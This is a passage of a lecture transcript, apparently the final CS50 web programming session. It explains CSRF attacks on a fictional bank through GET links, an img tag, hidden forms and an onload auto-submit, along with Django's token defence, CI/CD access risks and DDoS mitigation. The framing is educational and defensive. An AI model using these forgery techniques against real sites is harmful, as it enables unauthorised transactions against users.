into transferring money to me.
What are some ways to
protect against that?
What can yourbank.com do to make sure
that we can't do something like this?
Such that someone else
can't just add a link
that says click here and
then automatically initiate
the transfer of money.
Yeah?
AUDIENCE: When you're doing
an operation like this,
you want to send some
token with it so it
knows that it was you that's doing
it, and you're not being played.
BRIAN YU: Great, some token.
And certainly, we'll see more about
that when we get to some more details.
But right now, this is just a
link that you're clicking on.
So we're just clicking on a link.
And what else could the bank do?
But that's certainly one good answer.
AUDIENCE: Not expose a service
with a GET request like that.
BRIAN YU: Great.
Not expose a GET request like this.
That could certainly be something.
And in fact, this is something
that's generally good web practice.
That you don't want GET requests to
be modifying the state of something,
like modifying who has
what amounts of money.
That generally, all of that should
be inside of a POST request, such
that it really needs to be a form
submission that needs to happen
in order to allow that to happen.
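That advice, never letting a GET modify state, can be sketched like this. It's a toy handler with made-up names and an in-memory ledger, not any real bank's or framework's API.

```python
# A minimal sketch of the "no state changes on GET" rule: a transfer
# handler that refuses anything but POST. Names are illustrative.
balances = {"alice": 3000, "brian": 0}

def transfer(method, frm, to, amount):
    if method != "POST":
        # Bare links and <img> tags can only trigger GETs, so rejecting
        # GET means a link alone can no longer move money.
        return "405 Method Not Allowed"
    balances[frm] -= amount
    balances[to] += amount
    return "200 OK"

assert transfer("GET", "alice", "brian", 2800) == "405 Method Not Allowed"
assert balances == {"alice": 3000, "brian": 0}   # nothing moved
assert transfer("POST", "alice", "brian", 2800) == "200 OK"
assert balances == {"alice": 200, "brian": 2800}
```

As the rest of the discussion shows, though, requiring POST alone isn't enough, because a hidden form can still be auto-submitted; that's what the CSRF token is for.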
And of course, maybe this
isn't such a big deal
because I'm saying, click here.
And so as long as the user is smart
and as long as they're careful and they
hover over the link and see,
oh, this is going to take me
to yourbank.com/transfer, then I'm safe.
So how might a hacker get around that?
In order to make it such that the
user doesn't need to click on,
click here, in order to
initiate that transfer?
AUDIENCE: They don't need
[INAUDIBLE] in other website.
BRIAN YU: Great.
So hypothetically, we could just
add some JavaScript code here
that says that rather than a link
that someone needs to click on,
we'll just add some JavaScript
code that will automatically
redirect the user there, for instance.
And that could be something
that could happen as well.
But then at minimum, the user
is taken to that other web site,
and now they can see that
that transfer has happened.
But there are even more subtle
ways about doing this as well.
A couple of slides ago, we talked about how image tags, for instance, can be used.
Where if you provide the link to
whatever the source of the image is,
that will automatically trigger
a request there as well.
And so you might imagine that instead of
structuring my hacking page like this,
if I tried this as my exploit instead,
just render an image where the source
of that image is yourbank.com/transfer
and here's what I'm transferring.
Now, no need for a user to
click on any link at all.
As soon as they go to my
page, your web browser
is going to make a request
to this URL, and that's
going to potentially start
to initiate a transfer.
And so that's certainly a
potential security vulnerability.
And so someone suggested
OK, well, rather
than make your bank take all of
its transfers via GET requests,
we might instead want to do
this via making it a form
that someone needs to
submit, some POST request.
That it can't just be you clicking
on a link or you rendering some image
that's going to trigger
the transfer of funds.
So maybe you might imagine that
I could do something like this.
This might be an exploit that
I can use now on my site.
That I create a form whose
action is yourbank.com/transfer,
the method is POST, and now I have these hidden inputs, input type="hidden".
This is an input type that's just
not going to appear to the user.
The user is not going
to see this at all.
It's an input type named to, whose value
is who I want to transfer the money to.
I have an input type that is the
amount, which is the amount of money
that I want to transfer.
And then I have an input
type called submit,
which is just going to be a
button that says click here.
And so all the user is going to see,
if this code is rendered, is what?
What does the user see?
AUDIENCE: Click here.
BRIAN YU: Exactly.
They just see this one
input field, this button
that says click here, because
these two input fields are hidden.
And of course, click
here could say anything.
It could say next page, for instance.
Something benign that looks like
something you might reasonably
just click that would
take you somewhere else,
when in reality, it's submitting a
form that's going to transfer funds
to someone and to some amount.
But of course, maybe we're OK, because if the user is careful and isn't going to click on a button when they don't know what that button actually does, then they're safe. So how might a hacker still get around this and still be able to get the user to submit this form, even without the user clicking on a button?
Yeah?
AUDIENCE: Can you do a POST
request from JavaScript code?
BRIAN YU: Can you do a POST
request from JavaScript code?
Certainly you can.
We actually looked at
ways we could do that
before when we were talking about
AJAX and making requests to a server
in order to get more
information from the server
after we've already loaded the page.
So that's certainly one option as well.
Another way we could do it is just by adding an onload attribute to the body tag-- when you're done loading, here's what the body should do: document.forms[0].submit(), which gets the first form in the document and submits it. Just by adding that single line of JavaScript code, now as soon as the user loads this page, this form will be submitted, and then that will initiate the transfer at yourbank.com.
So certainly, this isn't a
good scenario we want to be in.
This is CSRF, Cross-Site
Request Forgery,
where, from some other site, we're able to create a request to yourbank.com that looks as if it came from the legitimate user, in order to initiate the transfer.
And so long as I know what
parameters that request takes,
I'm able to forge that request.
And so the solution, as
was pointed out, which
is what Django uses and a bunch
of other web frameworks use,
is to add a special token,
effectively a password.
Where the idea is that you would write this csrf_token tag inside of your Django template. And if you were to look at the HTML that gets rendered as a result, what's actually happening is that in place of csrf_token, the Django web server is inserting some long string, effectively a token or a password, that is associated with this specific form.
Such that when the
user submits that form,
the token is submitted along with it.
And the server can then check
to see does this token match
the token that I initially sent out.
And if and only if they match, we're going to actually initiate the transfer.
That way, no other website is able to forge a request to my bank's transfer route because they're not going to know what the token is.
It's going to be a new token
every time we make a request,
and that's going to allow us to avoid
a situation where someone might be able
to-- from some other site--
make a request that attacks the
/transfer route in this case.
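That token exchange can be sketched roughly like this. It's a toy illustration using Python's standard library, not Django's real implementation, which is more involved; the hidden-field name csrfmiddlewaretoken, though, is the one Django actually uses.

```python
import secrets
import hmac

# Tokens the server has handed out with rendered forms, keyed by session.
issued_tokens = {}

def render_form(session_id):
    """On GET: generate a fresh token and embed it as a hidden field."""
    token = secrets.token_urlsafe(32)
    issued_tokens[session_id] = token
    return '<input type="hidden" name="csrfmiddlewaretoken" value="%s">' % token

def handle_transfer(session_id, submitted_token):
    """On POST: only act if the submitted token matches the one we issued."""
    expected = issued_tokens.get(session_id, "")
    if not hmac.compare_digest(submitted_token, expected):
        return "403 Forbidden"       # forged request: token missing or wrong
    return "transfer initiated"

form = render_form("alice-session")
token = form.split('value="')[1].rstrip('">')
assert handle_transfer("alice-session", token) == "transfer initiated"
# An attacker's page doesn't know the token, so a forged POST is rejected:
assert handle_transfer("alice-session", "guessed-token") == "403 Forbidden"
```

The attacker's page can still build the form's to and amount fields, but it has no way to read the token out of the victim's copy of the page, so the forged submission fails.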
So that's why Django has
that CSRF token in place.
It's to prevent against
those kinds of attacks.
Flask on its own doesn't, by default, have this sort of protection built in, although there are extensions you can add on to Flask in order to help protect against this particular type of attack as well.
So these are also just
good things to be aware of,
potential security
vulnerabilities that can exist,
and things you'll want to think
about as you design your application.
Can just anyone initiate a transfer request by submitting a POST request, or do they need some special, potentially changing token as they go about doing that as well?
Questions about the
security vulnerabilities
we've talked about so far?
OK.
Let's go ahead and move on from Django
and talk a little bit about CI/CD.
And so this is relatively recent, where we were talking about how we might leverage CI tools-- we looked at Travis in particular-- as tools that we can use in order to run tests and deploy our code.
And we connected Travis
to GitHub, whereby
Travis was able to run tests on our
GitHub code inside of our repositories
and then check to make sure that
those tests, in fact, passed.
What vulnerabilities appear there?
Or are things that we
should be considering
when we start to think about that?
Yeah?
AUDIENCE: You're giving Travis
access to your codebase.
BRIAN YU: Yeah, exactly.
We're now giving Travis
access to our codebase.
So whereas before, our code was
stored on GitHub and GitHub alone,
such that, certainly, if
GitHub was compromised,
now our code is compromised as well.
Now we've given Travis access to
all of our private repositories
on GitHub potentially,
such that now there
are two points at
which being compromised
could result in our
code being compromised.
Whereby if GitHub is compromised,
our code is compromised.
But likewise, if Travis is
compromised for some security reason,
then our code might also be
compromised because Travis
has access to our GitHub account.
And so any time you
deal with accounts that
are able to grant permission to
other applications or other accounts
to get access to that information,
that's where there's potentially
room for security vulnerabilities.
And so we see that with
GitHub, where GitHub
is allowed to authorize other
applications if you give them
permission to have access
to your information as well.
But you see this in
other websites as well.
In fact, Facebook does this, and has been under controversy recently, for the idea that it can grant third party applications the right to look at your user information.
And if you grant a third
party application that right,
now if any one of those is compromised,
then your own user information
is compromised.
And so it's the same type of thing: if you're giving one website access to your user information, or to your code and your repositories, you want to be careful about what other services also have the same access to that information as well.
And so if you're the one
designing the services,
you want to be careful about what
other services you give access to.
And if you're the one
using GitHub or Travis,
you also want to be careful about
how many different third party
services have access to all of your
private repositories for example.
And so as a final example, moving on to what we talked about just last week, we talked a little bit about scalability and the idea that once we've written our application and we're ready to deploy it, we need to think about how we're going to scale this application as more and more users start using it.
We talked about load balancers and
having multiple, different servers.
And we talked about, in
particular, that any server
is a finite machine that can only
handle a certain number of requests
in a certain amount of time.
Maybe x requests per second for
instance, where x is some number.
And what potential vulnerabilities
or exploits come about there?
What could a potentially
malicious hacker
try to do knowing the constraints
of what our systems are capable of?
AUDIENCE: Like [INAUDIBLE]
can start DDoSing your system,
sending a bunch of
requests at the same time.
BRIAN YU: Exactly.
Sending a bunch of requests.
So if our server, for instance, can only handle 1,000 requests per second, and one hacker, on their computer, decides that they want to try and shut down our system, maybe they're going to send 1,001 requests in a single second to our server.
And this is what we'll generally call
a DoS, or denial-of-service attack,
where a user sends request after request after request
in an attempt to overload
our servers in order
to try and make sure that we're
unable to handle all the requests that
are coming in.
And if we're handling all of the
requests coming in from one user,
then we're potentially not
able to handle requests
coming from other people as well.
Of course, this probably
isn't too much of an issue
if we've got dozens
and dozens of servers
and only one computer is the
one making a lot of requests.
Which is why the next
thing you mentioned
was also a potential exploit
or a potential concern,
which is that what if it's not just
one, single computer, but a whole botnet
of a bunch of computers that are all
trying to make requests to the same web
server at the same time?
This is what we generally call a DDoS attack, a distributed denial-of-service attack, where
we have a lot of
different computers that
are all trying to make requests at the
same time to our same web application.
And as a result, it's quite
likely that the web application
might be overloaded by all these
requests and be unable to handle it.
And so what are ways of potentially
dealing with a DDoS attack?
Of a bunch of people trying to
make requests at the same time,
trying to shut down our server by
overloading it with too many requests?
Yeah.
AUDIENCE: Limit how many
requests they can make.
BRIAN YU: Try and limit how
many requests they can make.
So certainly one potential
approach to dealing
with DDoS attacks is to try and add
some sort of filtering system of trying
to-- before it actually gets to
the server, try and filter and see
is this a valid request or not?
And maybe there are heuristics
you can use for that.
And certainly, if you can
limit people, that if you
notice that this particular
computer is making a lot of requests
at the same time or in a
short amount of time, then
maybe you can put
downward pressure on that
by blacklisting that particular user.
So that's certainly something
we could think about as well.
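That filtering idea can be sketched as a small sliding-window rate limiter. This is a toy, in-process version; real deployments enforce limits at the load balancer, CDN, or ISP level, and the window and limit chosen here are arbitrary.

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 10   # arbitrary window for illustration
MAX_REQUESTS = 3      # arbitrary per-client limit within the window

recent = defaultdict(deque)   # client address -> timestamps of recent requests

def allow(client, now=None):
    """Return True if this client is under its limit, False to reject."""
    now = time.monotonic() if now is None else now
    q = recent[client]
    # Drop timestamps that have aged out of the window.
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()
    if len(q) >= MAX_REQUESTS:
        return False              # over the limit: drop or throttle
    q.append(now)
    return True

assert [allow("1.2.3.4", t) for t in (0, 1, 2, 3)] == [True, True, True, False]
assert allow("5.6.7.8", 3) is True       # other clients are unaffected
assert allow("1.2.3.4", 20) is True      # the window eventually slides past
```

Against a single noisy client this works; against a distributed attack from thousands of addresses, each client stays under its individual limit, which is exactly why DDoS defense usually has to happen upstream of the application.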
But at the end of the day, it really often does come down to just a battle of resources, of who has more resources: the adversary or you?
And so oftentimes this is not
something that you can just
deal with at the web
application level, but it's
something that needs to be dealt with
at the server level or the ISP level.
Where you really need to make
sure that your infrastructure is
in place, especially if you're
dealing with a large web application,
to make sure that you're able to
handle all of that potential traffic.
And so certainly, the end idea
of this and of all the topics
we've talked about so far today
is that through all of the things
we've talked about, whether it was
just a simple, static HTML web page
or dealing with scalability and Flask
and Django and other web services,
or JavaScript and how we might be able
to inject JavaScript code into our web
application, there are security
vulnerabilities everywhere.
And it's definitely a good idea to be thinking about what those vulnerabilities might be and how we might be able to deal with them when they arise.
And so now let's think about
moving beyond just this course
as we arrive at the
conclusion of the course.
What comes next?
If this is still something
that interests you,
if web programming is
something that you're
interested in continuing
to learn more about,
we were just really barely
scratching the surface here
when it came to programming
with Python and JavaScript.
We looked at Flask and Django in
particular as the web frameworks
that we were using in order to build
and design and deploy our websites.
But those certainly are
not the only options.
There are other web frameworks that are gaining popularity nowadays that are definitely worth looking into if this is the sort of thing that interests you.
Generally, we can divide them
into server-side frameworks,
the sort of frameworks that are going
to be running like Flask or Django
on our web server somewhere,
where Express.js and Ruby on Rails are examples of some server-side frameworks that are commonly used. And client-side frameworks include things like React or Angular, common frameworks that are used on the client side now,
in order to generate
components that are displayed
that are able to interact with
the web server in some way.
And so these are definitely
things to look at as well.
And then when it comes to actually
taking your web application
and deploying it to
the internet, if that's
something that's of
interest to you as well,
there are a whole
number of other services
that you can use as well for that.
So GitHub Pages was one
that we looked at way
at the very beginning of the
course, which is generally
used if we just want to deploy some
static content to a page like HTML
and CSS and JavaScript.
And that's totally
fine for GitHub Pages.
But if we want to run a web server,
we're going to need a little bit more
than that.
And so we did look a
little bit at Heroku
when we were thinking
about using our database.
So Heroku is a service that allows us to
host web applications on the internet.
It makes it relatively easy to take
a Flask or Django web application
and host it.
And in particular, it makes it very
easy to hook that up to a database,
for instance, in order to connect
it with a PostgreSQL database,
as we did in one of the
early projects in order
to allow us to deploy that as well.
But if you're looking for even more
power and even more feature-filled web
hosting than that, you can take a look
at Amazon Web Services or Google Cloud
or Microsoft Azure, all of which
offer a lot of different services
for taking web applications and
deploying them to the internet.
They often will use Docker,
which we looked at a little while
back when we were talking about
containerizing our application
and bundling together our web
application with the database
and any other services that might be
involved in running that application.
And so certainly these
are services that you
can use as well if you're thinking
about actually building out
one of these web applications
and deploying it to the internet.
And these larger services
like AWS or Microsoft Azure,
they have the ability to take care
of some of the scalability concerns
that we were talking about.
The ability to add
load balancers that are
able to make sure that
we have enough servers
to make sure that we're able to
handle all the requests coming in
from all the different users.
And they do auto scaling such
that as more users come in,
we can increase the number of servers or
decrease the number of servers as well.
And so these are increasingly
popular tools and technologies
that are ways of allowing people to
take web applications that they're
building on their own computers and
ultimately deploy them to the internet.
Before we wrap up, I just want
to make sure to say thank you
to all the people that were
really instrumental in making
the course possible.
To David, my co-instructor, who
unfortunately couldn't be here today.
But also to our great teaching
fellows, Anushree and Elle and Rodrigo
and Sebastian and Jessica
for running the course's office hours and the course's sections.
And of course, the CS50's
production team, Ramon and Andrew
and Max and Meredith and Ian
and Scully and Dan and Arturo
for making the lectures possible
and the lecture videos possible.
Thank you to you all.
And of course, finally, thank you to all
of you for joining us in this course,
for learning about web programming
with Python and JavaScript.
Hope you enjoyed it.
Hope you got an opportunity to
work on some hands-on projects that
were exciting and ultimately
showed you the power and capacity
that Python and JavaScript have for
building really dynamic and really
interesting web applications.
Can't wait to see what you guys
continue to do with your final projects.
But that's it for web programming
with Python and JavaScript,
so thank you all so much.
[APPLAUSE]
